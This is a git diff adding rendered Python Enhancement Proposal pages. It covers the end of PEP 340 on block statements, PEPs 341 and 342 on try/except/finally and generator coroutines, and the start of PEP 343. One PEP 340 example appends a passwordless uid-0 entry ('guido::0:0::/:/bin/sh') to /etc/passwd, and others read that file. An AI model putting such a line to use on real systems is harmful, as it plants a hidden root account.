  • Instead of trying to pick the ideal keyword, the block-statement +could simply have the form:
    EXPR1 as VAR1:
    +    BLOCK1
    +
    +
    +

    This is at first attractive because, together with a good choice +of function names (like those in the Examples section below) +used in EXPR1, it reads well, and feels like a “user-defined +statement”. And yet, it makes me (and many others) +uncomfortable; without a keyword the syntax is very “bland”, +difficult to look up in a manual (remember that ‘as’ is +optional), and it makes the meaning of break and continue in the +block-statement even more confusing.

    +
  • +
  • Phillip Eby has proposed to have the block-statement use +an entirely different API than the for-loop, to differentiate +between the two. A generator would have to be wrapped in a +decorator to make it support the block API. IMO this adds more +complexity with very little benefit; and we can’t really deny +that the block-statement is conceptually a loop – it supports +break and continue, after all.
  • +
  • This keeps getting proposed: “block VAR1 = EXPR1” instead of +“block EXPR1 as VAR1”. That would be very misleading, since +VAR1 does not get assigned the value of EXPR1; EXPR1 results +in a generator which is assigned to an internal variable, and +VAR1 is the value returned by successive calls to the __next__() +method of that iterator.
  • +
  • Why not change the translation to apply iter(EXPR1)? All the +examples would continue to work. But this makes the +block-statement more like a for-loop, while the emphasis ought +to be on the difference between the two. Not calling iter() +catches a bunch of misunderstandings, like using a sequence as +EXPR1.
  • +
+
+
+

Comparison to Thunks

+

Alternative semantics proposed for the block-statement turn the +block into a thunk (an anonymous function that blends into the +containing scope).

+

The main advantage of thunks that I can see is that you can save +the thunk for later, like a callback for a button widget (the +thunk then becomes a closure). You can’t use a yield-based block +for that (except in Ruby, which uses yield syntax with a +thunk-based implementation). But I have to say that I almost see +this as an advantage: I think I’d be slightly uncomfortable seeing +a block and not knowing whether it will be executed in the normal +control flow or later. Defining an explicit nested function for +that purpose doesn’t have this problem for me, because I already +know that the ‘def’ keyword means its body is executed later.

+

The other problem with thunks is that once we think of them as the +anonymous functions they are, we’re pretty much forced to say that +a return statement in a thunk returns from the thunk rather than +from the containing function. Doing it any other way would cause +major weirdness when the thunk were to survive its containing +function as a closure (perhaps continuations would help, but I’m +not about to go there :-).

+

But then an IMO important use case for the resource cleanup +template pattern is lost. I routinely write code like this:

+
def findSomething(self, key, default=None):
    self.lock.acquire()
    try:
        for item in self.elements:
            if item.matches(key):
                return item
        return default
    finally:
        self.lock.release()
+
+
+

and I’d be bummed if I couldn’t write this as:

+
def findSomething(self, key, default=None):
    block locking(self.lock):
        for item in self.elements:
            if item.matches(key):
                return item
        return default
+
+
+

This particular example can be rewritten using a break:

+
def findSomething(self, key, default=None):
    block locking(self.lock):
        for item in self.elements:
            if item.matches(key):
                break
        else:
            item = default
    return item
+
+
+

but it looks forced and the transformation isn’t always that easy; +you’d be forced to rewrite your code in a single-return style +which feels too restrictive.

+

Also note the semantic conundrum of a yield in a thunk – the only +reasonable interpretation is that this turns the thunk into a +generator!

+

Greg Ewing believes that thunks “would be a lot simpler, doing +just what is required without any jiggery pokery with exceptions +and break/continue/return statements. It would be easy to explain +what it does and why it’s useful.”

+

But in order to obtain the required local variable sharing between +the thunk and the containing function, every local variable used +or set in the thunk would have to become a ‘cell’ (our mechanism +for sharing variables between nested scopes). Cells slow down +access compared to regular local variables: access involves an +extra C function call (PyCell_Get() or PyCell_Set()).

+

Perhaps not entirely coincidentally, the last example above +(findSomething() rewritten to avoid a return inside the block) +shows that, unlike for regular nested functions, we’ll want +variables assigned to by the thunk also to be shared with the +containing function, even if they are not assigned to outside the +thunk.

+

Greg Ewing again: “generators have turned out to be more powerful, +because you can have more than one of them on the go at once. Is +there a use for that capability here?”

+

I believe there are definitely uses for this; several people have +already shown how to do asynchronous light-weight threads using +generators (e.g. David Mertz quoted in PEP 288, and Fredrik +Lundh [3]).

+

And finally, Greg says: “a thunk implementation has the potential +to easily handle multiple block arguments, if a suitable syntax +could ever be devised. It’s hard to see how that could be done in +a general way with the generator implementation.”

+

However, the use cases for multiple blocks seem elusive.

+

(Proposals have since been made to change the implementation of +thunks to remove most of these objections, but the resulting +semantics are fairly complex to explain and to implement, so IMO +that defeats the purpose of using thunks in the first place.)

+
+
+

Examples

+

(Several of these examples contain “yield None”. If PEP 342 is +accepted, these can be changed to just “yield” of course.)

+
    +
  1. A template for ensuring that a lock, acquired at the start of a +block, is released when the block is left:
    def locking(lock):
    +    lock.acquire()
    +    try:
    +        yield None
    +    finally:
    +        lock.release()
    +
    +
    +

    Used as follows:

    +
    block locking(myLock):
    +    # Code here executes with myLock held.  The lock is
    +    # guaranteed to be released when the block is left (even
    +    # if via return or by an uncaught exception).
    +
    +
    +
  2. A template for opening a file that ensures the file is closed when the block is left:
    def opening(filename, mode="r"):
    +    f = open(filename, mode)
    +    try:
    +        yield f
    +    finally:
    +        f.close()
    +
    +
    +

    Used as follows:

    +
    block opening("/etc/passwd") as f:
    +    for line in f:
    +        print line.rstrip()
    +
    +
    +
  3. A template for committing or rolling back a database transaction:
    def transactional(db):
    +    try:
    +        yield None
    +    except:
    +        db.rollback()
    +        raise
    +    else:
    +        db.commit()
    +
    +
    +
  4. A template that tries something up to n times:
    def auto_retry(n=3, exc=Exception):
    +    for i in range(n):
    +        try:
    +            yield None
    +            return
    +        except exc, err:
    +            # perhaps log exception here
    +            continue
    +    raise # re-raise the exception we caught earlier
    +
    +
    +

    Used as follows:

    +
    block auto_retry(3, IOError):
    +    f = urllib.urlopen("https://www.example.com/")
    +    print f.read()
    +
    +
    +
  5. It is possible to nest blocks and combine templates:
    def locking_opening(lock, filename, mode="r"):
    +    block locking(lock):
    +        block opening(filename) as f:
    +            yield f
    +
    +
    +

    Used as follows:

    +
    block locking_opening(myLock, "/etc/passwd") as f:
    +    for line in f:
    +        print line.rstrip()
    +
    +
    +

    (If this example confuses you, consider that it is equivalent +to using a for-loop with a yield in its body in a regular +generator which is invoking another iterator or generator +recursively; see for example the source code for os.walk().)

    +
  6. It is possible to write a regular iterator with the semantics of example 1:
    class locking:
    +   def __init__(self, lock):
    +       self.lock = lock
    +       self.state = 0
    +   def __next__(self, arg=None):
    +       # ignores arg
    +       if self.state:
    +           assert self.state == 1
    +           self.lock.release()
    +           self.state += 1
    +           raise StopIteration
    +       else:
    +           self.lock.acquire()
    +           self.state += 1
    +           return None
    +   def __exit__(self, type, value=None, traceback=None):
    +       assert self.state in (0, 1, 2)
    +       if self.state == 1:
    +           self.lock.release()
    +       raise type, value, traceback
    +
    +
    +

    (This example is easily modified to implement the other +examples; it shows how much simpler generators are for the same +purpose.)

    +
  7. Redirect stdout temporarily:
    def redirecting_stdout(new_stdout):
    +    save_stdout = sys.stdout
    +    try:
    +        sys.stdout = new_stdout
    +        yield None
    +    finally:
    +        sys.stdout = save_stdout
    +
    +
    +

    Used as follows:

    +
    block opening(filename, "w") as f:
    +    block redirecting_stdout(f):
    +        print "Hello world"
    +
    +
    +
  8. A variant on opening() that also returns an error condition:
    def opening_w_error(filename, mode="r"):
    +    try:
    +        f = open(filename, mode)
    +    except IOError, err:
    +        yield None, err
    +    else:
    +        try:
    +            yield f, None
    +        finally:
    +            f.close()
    +
    +
    +

    Used as follows:

    +
    block opening_w_error("/etc/passwd", "a") as f, err:
    +    if err:
    +        print "IOError:", err
    +    else:
    +        f.write("guido::0:0::/:/bin/sh\n")
    +
    +
    +
+
+
+

Acknowledgements

+

In no useful order: Alex Martelli, Barry Warsaw, Bob Ippolito, +Brett Cannon, Brian Sabbey, Chris Ryland, Doug Landauer, Duncan +Booth, Fredrik Lundh, Greg Ewing, Holger Krekel, Jason Diamond, +Jim Jewett, Josiah Carlson, Ka-Ping Yee, Michael Chermside, +Michael Hudson, Neil Schemenauer, Alyssa Coghlan, Paul Moore, +Phillip Eby, Raymond Hettinger, Georg Brandl, Samuele +Pedroni, Shannon Behrens, Skip Montanaro, Steven Bethard, Terry +Reedy, Tim Delaney, Aahz, and others. Thanks all for the valuable +contributions!

+
+
+

References

+

[1] https://mail.python.org/pipermail/python-dev/2005-April/052821.html

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0340.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0341/index.html b/pep-0341/index.html new file mode 100644 index 00000000000..77fe7eb34d1 --- /dev/null +++ b/pep-0341/index.html @@ -0,0 +1,242 @@ + + + + + + + + PEP 341 – Unifying try-except and try-finally | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 341 – Unifying try-except and try-finally

+
+
Author:
+
Georg Brandl <georg at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
04-May-2005
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a change in the syntax and semantics of try +statements to allow combined try-except-finally blocks. This +means in short that it would be valid to write:

+
try:
+    <do something>
+except Exception:
+    <handle the error>
+finally:
+    <cleanup>
+
+
+
+
+

Rationale/Proposal

+

There are many use cases for the try-except statement and +for the try-finally statement per se; however, often one needs +to catch exceptions and execute some cleanup code afterwards. +It is slightly annoying and not very intelligible that +one has to write:

+
f = None
+try:
+    try:
+        f = open(filename)
+        text = f.read()
+    except IOError:
+        print 'An error occurred'
+finally:
+    if f:
+        f.close()
+
+
+

So it is proposed that a construction like this:

+
try:
+    <suite 1>
+except Ex1:
+    <suite 2>
+<more except: clauses>
+else:
+    <suite 3>
+finally:
+    <suite 4>
+
+
+

be exactly the same as the legacy:

+
try:
+    try:
+        <suite 1>
+    except Ex1:
+        <suite 2>
+    <more except: clauses>
+    else:
+        <suite 3>
+finally:
+    <suite 4>
+
+
+

This is backwards compatible, and every try statement that is +legal today would continue to work.
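A runnable sketch of the unified form (the file name is chosen arbitrarily):

def read_first_line(filename):
    f = None
    try:
        f = open(filename)
        return f.readline()
    except IOError:
        print('An error occurred')
        return ''
    finally:
        if f:
            f.close()

print(read_first_line('/etc/passwd'))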

+
+
+

Changes to the grammar

+

The grammar for the try statement, which is currently:

+
try_stmt: ('try' ':' suite (except_clause ':' suite)+
+        ['else' ':' suite] | 'try' ':' suite 'finally' ':' suite)
+
+
+

would have to become:

+
try_stmt: 'try' ':' suite
+        (
+            (except_clause ':' suite)+
+            ['else' ':' suite]
+            ['finally' ':' suite]
+        |
+            'finally' ':' suite
+        )
+
+
+
+
+

Implementation

+

As the PEP author currently does not have sufficient knowledge +of the CPython implementation, he is unfortunately not able +to deliver one. Thomas Lee has submitted a patch [2].

+

However, according to Guido, it should be a piece of cake to +implement [1] – at least for a core hacker.

+

This patch was committed 17 December 2005, SVN revision 41740 [3].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0341.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0342/index.html b/pep-0342/index.html new file mode 100644 index 00000000000..295edb6ac37 --- /dev/null +++ b/pep-0342/index.html @@ -0,0 +1,705 @@ + + + + + + + + PEP 342 – Coroutines via Enhanced Generators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 342 – Coroutines via Enhanced Generators

+
+
Author:
+
Guido van Rossum, Phillip J. Eby
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
10-May-2005
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP proposes some enhancements to the API and syntax of generators, to +make them usable as simple coroutines. It is basically a combination of ideas +from these two PEPs, which may be considered redundant if this PEP is +accepted:

+
    +
  • PEP 288, Generators Attributes and Exceptions. The current PEP covers its +second half, generator exceptions (in fact the throw() method name was +taken from PEP 288). PEP 342 replaces generator attributes, however, with a +concept from an earlier revision of PEP 288, the yield expression.
  • +
  • PEP 325, Resource-Release Support for Generators. PEP 342 ties up a few +loose ends in the PEP 325 spec, to make it suitable for actual +implementation.
  • +
+
+
+

Motivation

+

Coroutines are a natural way of expressing many algorithms, such as +simulations, games, asynchronous I/O, and other forms of event-driven +programming or co-operative multitasking. Python’s generator functions are +almost coroutines – but not quite – in that they allow pausing execution to +produce a value, but do not provide for values or exceptions to be passed in +when execution resumes. They also do not allow execution to be paused within +the try portion of try/finally blocks, and therefore make it difficult +for an aborted coroutine to clean up after itself.

+

Also, generators cannot yield control while other functions are executing, +unless those functions are themselves expressed as generators, and the outer +generator is written to yield in response to values yielded by the inner +generator. This complicates the implementation of even relatively simple use +cases like asynchronous communications, because calling any functions either +requires the generator to block (i.e. be unable to yield control), or else a +lot of boilerplate looping code must be added around every needed function +call.

+

However, if it were possible to pass values or exceptions into a generator at +the point where it was suspended, a simple co-routine scheduler or trampoline +function would let coroutines call each other without blocking – a +tremendous boon for asynchronous applications. Such applications could then +write co-routines to do non-blocking socket I/O by yielding control to an I/O +scheduler until data has been sent or becomes available. Meanwhile, code that +performs the I/O would simply do something like this:

+
data = (yield nonblocking_read(my_socket, nbytes))
+
+
+

in order to pause execution until the nonblocking_read() coroutine produced +a value.

+

In other words, with a few relatively minor enhancements to the language and to +the implementation of the generator-iterator type, Python will be able to +support performing asynchronous operations without needing to write the entire +application as a series of callbacks, and without requiring the use of +resource-intensive threads for programs that need hundreds or even thousands of +co-operatively multitasking pseudothreads. Thus, these enhancements will give +standard Python many of the benefits of the Stackless Python fork, without +requiring any significant modification to the CPython core or its APIs. In +addition, these enhancements should be readily implementable by any Python +implementation (such as Jython) that already supports generators.

+
+
+

Specification Summary

+

By adding a few simple methods to the generator-iterator type, and with two +minor syntax adjustments, Python developers will be able to use generator +functions to implement co-routines and other forms of co-operative +multitasking. These methods and adjustments are:

+
    +
  1. Redefine yield to be an expression, rather than a statement. The current +yield statement would become a yield expression whose value is thrown away. +A yield expression’s value is None whenever the generator is resumed by +a normal next() call.
  2. +
  3. Add a new send() method for generator-iterators, which resumes the +generator and sends a value that becomes the result of the current +yield-expression. The send() method returns the next value yielded by +the generator, or raises StopIteration if the generator exits without +yielding another value.
  4. +
  5. Add a new throw() method for generator-iterators, which raises an +exception at the point where the generator was paused, and which returns the +next value yielded by the generator, raising StopIteration if the +generator exits without yielding another value. (If the generator does not +catch the passed-in exception, or raises a different exception, then that +exception propagates to the caller.)
  6. +
  7. Add a close() method for generator-iterators, which raises +GeneratorExit at the point where the generator was paused. If the +generator then raises StopIteration (by exiting normally, or due to +already being closed) or GeneratorExit (by not catching the exception), +close() returns to its caller. If the generator yields a value, a +RuntimeError is raised. If the generator raises any other exception, it +is propagated to the caller. close() does nothing if the generator has +already exited due to an exception or normal exit.
  8. +
  9. Add support to ensure that close() is called when a generator iterator +is garbage-collected.
  10. +
  11. Allow yield to be used in try/finally blocks, since garbage +collection or an explicit close() call would now allow the finally +clause to execute.
  12. +
+

A prototype patch implementing all of these changes against the current Python +CVS HEAD is available as SourceForge patch #1223381 +(https://bugs.python.org/issue1223381).

+
+
+

Specification: Sending Values into Generators

+
+

New generator method: send(value)

+

A new method for generator-iterators is proposed, called send(). It +takes exactly one argument, which is the value that should be sent in to +the generator. Calling send(None) is exactly equivalent to calling a +generator’s next() method. Calling send() with any other value is +the same, except that the value produced by the generator’s current +yield expression will be different.

+

Because generator-iterators begin execution at the top of the generator’s +function body, there is no yield expression to receive a value when the +generator has just been created. Therefore, calling send() with a +non-None argument is prohibited when the generator iterator has just +started, and a TypeError is raised if this occurs (presumably due to a +logic error of some kind). Thus, before you can communicate with a +coroutine you must first call next() or send(None) to advance its +execution to the first yield expression.

+

As with the next() method, the send() method returns the next value +yielded by the generator-iterator, or raises StopIteration if the +generator exits normally, or has already exited. If the generator raises an +uncaught exception, it is propagated to send()’s caller.

+
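As an illustration (a hypothetical snippet, not taken from the PEP), the warm-up requirement and the round trip of values work like this:

def accumulator():
+    total = 0
+    while True:
+        # send() delivers a value here; a plain next() delivers None
+        value = (yield total)
+        if value is not None:
+            total += value
+
+acc = accumulator()
+print acc.next()     # 0 -- advance to the first yield before sending
+print acc.send(10)   # 10
+print acc.send(5)    # 15
+# accumulator().send(1) would raise TypeError: a just-started
+# generator only accepts send(None).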
+
+

New syntax: Yield Expressions

+

The yield-statement will be allowed to be used on the right-hand side of an +assignment; in that case it is referred to as yield-expression. The value +of this yield-expression is None unless send() was called with a +non-None argument; see below.

+

A yield-expression must always be parenthesized except when it occurs as the +top-level expression on the right-hand side of an assignment. So

+
x = yield 42
+x = yield
+x = 12 + (yield 42)
+x = 12 + (yield)
+foo(yield 42)
+foo(yield)
+
+
+

are all legal, but

+
x = 12 + yield 42
+x = 12 + yield
+foo(yield 42, 12)
+foo(yield, 12)
+
+
+

are all illegal. (Some of the edge cases are motivated by the current +legality of yield 12, 42.)

+

Note that a yield-statement or yield-expression without an expression is now +legal. This makes sense: when the information flow in the next() call +is reversed, it should be possible to yield without passing an explicit +value (yield is of course equivalent to yield None).

+

When send(value) is called, the yield-expression that it resumes will +return the passed-in value. When next() is called, the resumed +yield-expression will return None. If the yield-expression is a +yield-statement, this returned value is ignored, similar to ignoring the +value returned by a function call used as a statement.

+

In effect, a yield-expression is like an inverted function call; the +argument to yield is in fact returned (yielded) from the currently executing +function, and the return value of yield is the argument passed in via +send().

+

Note: the syntactic extensions to yield make its use very similar to that in +Ruby. This is intentional. Do note that in Python the block passes a value +to the generator using send(EXPR) rather than return EXPR, and the +underlying mechanism whereby control is passed between the generator and the +block is completely different. Blocks in Python are not compiled into +thunks; rather, yield suspends execution of the generator’s frame. Some +edge cases work differently; in Python, you cannot save the block for later +use, and you cannot test whether there is a block or not. (XXX - this stuff +about blocks seems out of place now, perhaps Guido can edit to clarify.)

+
+
+
+

Specification: Exceptions and Cleanup

+

Let a generator object be the iterator produced by calling a generator +function. Below, g always refers to a generator object.

+
+

New syntax: yield allowed inside try-finally

+

The syntax for generator functions is extended to allow a yield-statement +inside a try-finally statement.

+
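For example (a hypothetical sketch, not from the PEP), a generator can now guarantee that a file is closed whether it is exhausted, abandoned, or closed explicitly:

def filereader(name):
+    f = open(name)
+    try:
+        for line in f:
+            yield line    # a yield inside try/finally is now legal
+    finally:
+        f.close()         # runs on exhaustion, close(), or collection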
+
+

New generator method: throw(type, value=None, traceback=None)

+

g.throw(type, value, traceback) causes the specified exception to be +thrown at the point where the generator g is currently suspended (i.e. at +a yield-statement, or at the start of its function body if next() has +not been called yet). If the generator catches the exception and yields +another value, that is the return value of g.throw(). If it doesn’t +catch the exception, the throw() appears to raise the same exception +passed it (it falls through). If the generator raises another exception +(this includes the StopIteration produced when it returns) that +exception is raised by the throw() call. In summary, throw() +behaves like next() or send(), except it raises an exception at the +suspension point. If the generator is already in the closed state, +throw() just raises the exception it was passed without executing any of +the generator’s code.

+

The effect of raising the exception is exactly as if the statement:

+
raise type, value, traceback
+
+
+

was executed at the suspension point. The type argument must not be +None, and the type and value must be compatible. If the value is not an +instance of the type, a new exception instance is created using the value, +following the same rules that the raise statement uses to create an +exception instance. The traceback, if supplied, must be a valid Python +traceback object, or a TypeError occurs.

+

Note: The name of the throw() method was selected for several reasons. +Raise is a keyword and so cannot be used as a method name. Unlike +raise (which immediately raises an exception from the current execution +point), throw() first resumes the generator, and only then raises the +exception. The word throw is suggestive of putting the exception in +another location, and is already associated with exceptions in other +languages.

+

Alternative method names were considered: resolve(), signal(), +genraise(), raiseinto(), and flush(). None of these seem to fit +as well as throw().

+
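A small hypothetical demonstration (not part of the PEP) of throw() resuming a generator with an exception:

def watcher():
+    while True:
+        try:
+            yield
+        except ValueError, exc:
+            print "recovered from:", exc   # execution resumes here
+
+w = watcher()
+w.next()                     # advance to the first yield
+w.throw(ValueError, "bad")   # prints the message, then returns the
+                             # next yielded value (None here)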
+
+

New standard exception: GeneratorExit

+

A new standard exception is defined, GeneratorExit, inheriting from +Exception. A generator should handle this by re-raising it (or just not +catching it) or by raising StopIteration.

+
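For example (a hypothetical sketch), a generator that intercepts GeneratorExit for cleanup should still let it (or StopIteration) propagate:

def worker():
+    try:
+        while True:
+            yield
+    except GeneratorExit:
+        print "worker: cleaning up"
+        raise   # re-raising (or simply returning) lets close() succeed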
+
+

New generator method: close()

+

g.close() is defined by the following pseudo-code:

+
def close(self):
+    try:
+        self.throw(GeneratorExit)
+    except (GeneratorExit, StopIteration):
+        pass
+    else:
+        raise RuntimeError("generator ignored GeneratorExit")
+    # Other exceptions are not caught
+
+
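Continuing the hypothetical filereader sketch from above, close() runs the generator's finally clause deterministically:

r = filereader("/etc/passwd")
+print r.next()   # first line of the file
+r.close()        # GeneratorExit is raised at the yield; the finally
+                 # clause closes the file, then close() returns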
+
+
+

New generator method: __del__()

+

g.__del__() is a wrapper for g.close(). This will be called when +the generator object is garbage-collected (in CPython, this is when its +reference count goes to zero). If close() raises an exception, a +traceback for the exception is printed to sys.stderr and further +ignored; it is not propagated back to the place that triggered the garbage +collection. This is consistent with the handling of exceptions in +__del__() methods on class instances.

+

If the generator object participates in a cycle, g.__del__() may not be +called. This is the behavior of CPython’s current garbage collector. The +reason for the restriction is that the GC code needs to break a cycle at +an arbitrary point in order to collect it, and from then on no Python code +should be allowed to see the objects that formed the cycle, as they may be +in an invalid state. Objects hanging off a cycle are not subject to this +restriction.

+

Note that it is unlikely to see a generator object participate in a cycle in +practice. However, storing a generator object in a global variable creates +a cycle via the generator frame’s f_globals pointer. Another way to +create a cycle would be to store a reference to the generator object in a +data structure that is passed to the generator as an argument (e.g., if an +object has a method that’s a generator, and keeps a reference to a running +iterator created by that method). Neither of these cases are very likely +given the typical patterns of generator use.

+

Also, in the CPython implementation of this PEP, the frame object used by +the generator should be released whenever its execution is terminated due to +an error or normal exit. This will ensure that generators that cannot be +resumed do not remain part of an uncollectable reference cycle. This allows +other code to potentially use close() in a try/finally or with +block (per PEP 343) to ensure that a given generator is properly finalized.

+
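For instance (hypothetical usage), a caller can guarantee finalization without relying on the garbage collector:

g = filereader("/etc/passwd")
+try:
+    for line in g:
+        print line.rstrip()
+finally:
+    g.close()   # a no-op if g already exited; deterministic otherwise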
+
+
+

Optional Extensions

+
+

The Extended continue Statement

+

An earlier draft of this PEP proposed a new continue EXPR syntax for use +in for-loops (carried over from PEP 340), that would pass the value of +EXPR into the iterator being looped over. This feature has been withdrawn +for the time being, because the scope of this PEP has been narrowed to focus +only on passing values into generator-iterators, and not other kinds of +iterators. It was also felt by some on the Python-Dev list that adding new +syntax for this particular feature would be premature at best.

+
+
+
+

Open Issues

+

Discussion on python-dev has revealed some open issues. I list them here, with +my preferred resolution and its motivation. The PEP as currently written +reflects this preferred resolution.

+
    +
  1. What exception should be raised by close() when the generator yields +another value as a response to the GeneratorExit exception?

    I originally chose TypeError because it represents gross misbehavior of +the generator function, which should be fixed by changing the code. But the +with_template decorator class in PEP 343 uses RuntimeError for +similar offenses. Arguably they should all use the same exception. I’d +rather not introduce a new exception class just for this purpose, since it’s +not an exception that I want people to catch: I want it to turn into a +traceback which is seen by the programmer who then fixes the code. So now I +believe they should both raise RuntimeError. There are some precedents +for that: it’s raised by the core Python code in situations where endless +recursion is detected, and for uninitialized objects (and for a variety of +miscellaneous conditions).

    +
  2. +
  3. Oren Tirosh has proposed renaming the send() method to feed(), for +compatibility with the consumer interface (see +http://effbot.org/zone/consumer.htm for the specification.)

    However, looking more closely at the consumer interface, it seems that the +desired semantics for feed() are different than for send(), because +send() can’t be meaningfully called on a just-started generator. Also, +the consumer interface as currently defined doesn’t include handling for +StopIteration.

    +

    Therefore, it seems like it would probably be more useful to create a simple +decorator that wraps a generator function to make it conform to the consumer +interface. For example, it could warm up the generator with an initial +next() call, trap StopIteration, and perhaps even provide reset() by +re-invoking the generator function.

    +
  4. +
+
+
+

Examples

+
    +
  1. A simple consumer decorator that makes a generator function automatically +advance to its first yield point when initially called:
    def consumer(func):
    +    def wrapper(*args,**kw):
    +        gen = func(*args, **kw)
    +        gen.next()
    +        return gen
    +    wrapper.__name__ = func.__name__
    +    wrapper.__dict__ = func.__dict__
    +    wrapper.__doc__  = func.__doc__
    +    return wrapper
    +
    +
    +
  2. +
  3. An example of using the consumer decorator to create a reverse generator +that receives images and creates thumbnail pages, sending them on to another +consumer. Functions like this can be chained together to form efficient +processing pipelines of consumers that each can have complex internal +state:
    import os   # needed by jpeg_writer below
    +
    +@consumer
    +def thumbnail_pager(pagesize, thumbsize, destination):
    +    while True:
    +        page = new_image(pagesize)
    +        rows, columns = pagesize / thumbsize
    +        pending = False
    +        try:
    +            for row in xrange(rows):
    +                for column in xrange(columns):
    +                    thumb = create_thumbnail((yield), thumbsize)
    +                    page.write(
    +                        thumb, column*thumbsize.x, row*thumbsize.y )
    +                    pending = True
    +        except GeneratorExit:
    +            # close() was called, so flush any pending output
    +            if pending:
    +                destination.send(page)
    +
    +            # then close the downstream consumer, and exit
    +            destination.close()
    +            return
    +        else:
    +            # we finished a page full of thumbnails, so send it
    +            # downstream and keep on looping
    +            destination.send(page)
    +
    +@consumer
    +def jpeg_writer(dirname):
    +    fileno = 1
    +    while True:
    +        filename = os.path.join(dirname,"page%04d.jpg" % fileno)
    +        write_jpeg((yield), filename)
    +        fileno += 1
    +
    +
    +# Put them together to make a function that makes thumbnail
    +# pages from a list of images and other parameters.
    +#
    +def write_thumbnails(pagesize, thumbsize, images, output_dir):
    +    pipeline = thumbnail_pager(
    +        pagesize, thumbsize, jpeg_writer(output_dir)
    +    )
    +
    +    for image in images:
    +        pipeline.send(image)
    +
    +    pipeline.close()
    +
    +
    +
  4. +
  5. A simple co-routine scheduler or trampoline that lets coroutines call +other coroutines by yielding the coroutine they wish to invoke. Any +non-generator value yielded by a coroutine is returned to the coroutine that +called the one yielding the value. Similarly, if a coroutine raises an +exception, the exception is propagated to its caller. In effect, this +example emulates simple tasklets as are used in Stackless Python, as long as +you use a yield expression to invoke routines that would otherwise block. +This is only a very simple example, and far more sophisticated schedulers +are possible. (For example, the existing GTasklet framework for Python +(http://www.gnome.org/~gjc/gtasklet/gtasklets.html) and the peak.events +framework (http://peak.telecommunity.com/) already implement similar +scheduling capabilities, but must currently use awkward workarounds for the +inability to pass values or exceptions into generators.)
    import collections
    +import sys     # schedule() uses sys.exc_info()
    +import types   # resume() checks types.GeneratorType
    +
    +class Trampoline:
    +    """Manage communications between coroutines"""
    +
    +    running = False
    +
    +    def __init__(self):
    +        self.queue = collections.deque()
    +
    +    def add(self, coroutine):
    +        """Request that a coroutine be executed"""
    +        self.schedule(coroutine)
    +
    +    def run(self):
    +        result = None
    +        self.running = True
    +        try:
    +            while self.running and self.queue:
    +               func = self.queue.popleft()
    +               result = func()
    +            return result
    +        finally:
    +            self.running = False
    +
    +    def stop(self):
    +        self.running = False
    +
    +    def schedule(self, coroutine, stack=(), val=None, *exc):
    +        def resume():
    +            value = val
    +            try:
    +                if exc:
    +                    value = coroutine.throw(value,*exc)
    +                else:
    +                    value = coroutine.send(value)
    +            except:
    +                if stack:
    +                    # send the error back to the "caller"
    +                    self.schedule(
    +                        stack[0], stack[1], *sys.exc_info()
    +                    )
    +                else:
    +                    # Nothing left in this pseudothread to
    +                    # handle it, let it propagate to the
    +                    # run loop
    +                    raise
    +
    +            if isinstance(value, types.GeneratorType):
    +                # Yielded to a specific coroutine, push the
    +                # current one on the stack, and call the new
    +                # one with no args
    +                self.schedule(value, (coroutine,stack))
    +
    +            elif stack:
    +                # Yielded a result, pop the stack and send the
    +                # value to the caller
    +                self.schedule(stack[0], stack[1], value)
    +
    +            # else: this pseudothread has ended
    +
    +        self.queue.append(resume)
    +
    +
    +
  6. +
  7. A simple echo server, and code to run it using a trampoline (presumes the +existence of nonblocking_read, nonblocking_write, and other I/O +coroutines, that e.g. raise ConnectionLost if the connection is +closed):
    # coroutine function that echoes data back on a connected
    +# socket
    +#
    +def echo_handler(sock):
    +    while True:
    +        try:
    +            data = yield nonblocking_read(sock)
    +            yield nonblocking_write(sock, data)
    +        except ConnectionLost:
    +            pass  # exit normally if connection lost
    +
    +# coroutine function that listens for connections on a
    +# socket, and then launches a service "handler" coroutine
    +# to service the connection
    +#
    +def listen_on(trampoline, sock, handler):
    +    while True:
    +        # get the next incoming connection
    +        connected_socket = yield nonblocking_accept(sock)
    +
    +        # start another coroutine to handle the connection
    +        trampoline.add( handler(connected_socket) )
    +
    +# Create a scheduler to manage all our coroutines
    +t = Trampoline()
    +
    +# Create a coroutine instance to run the echo_handler on
    +# incoming connections
    +#
    +server = listen_on(
    +    t, listening_socket("localhost","echo"), echo_handler
    +)
    +
    +# Add the coroutine to the scheduler
    +t.add(server)
    +
    +# loop forever, accepting connections and servicing them
    +# "in parallel"
    +#
    +t.run()
    +
    +
    +
  8. +
+
+
+

Reference Implementation

+

A prototype patch implementing all of the features described in this PEP is +available as SourceForge patch #1223381 (https://bugs.python.org/issue1223381).

+

This patch was committed to CVS 01-02 August 2005.

+
+
+

Acknowledgements

+

Raymond Hettinger (PEP 288) and Samuele Pedroni (PEP 325) first formally +proposed the ideas of communicating values or exceptions into generators, and +the ability to close generators. Timothy Delaney suggested the title of this +PEP, and Steven Bethard helped edit a previous version. See also the +Acknowledgements section of PEP 340.

+
+
+

References

+

TBD.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0342.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0343/index.html b/pep-0343/index.html new file mode 100644 index 00000000000..f9bc754ae45 --- /dev/null +++ b/pep-0343/index.html @@ -0,0 +1,1067 @@ + PEP 343 – The “with” Statement | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 343 – The “with” Statement

+
+
Author:
+
Guido van Rossum, Alyssa Coghlan
+
Status:
+
Final
+
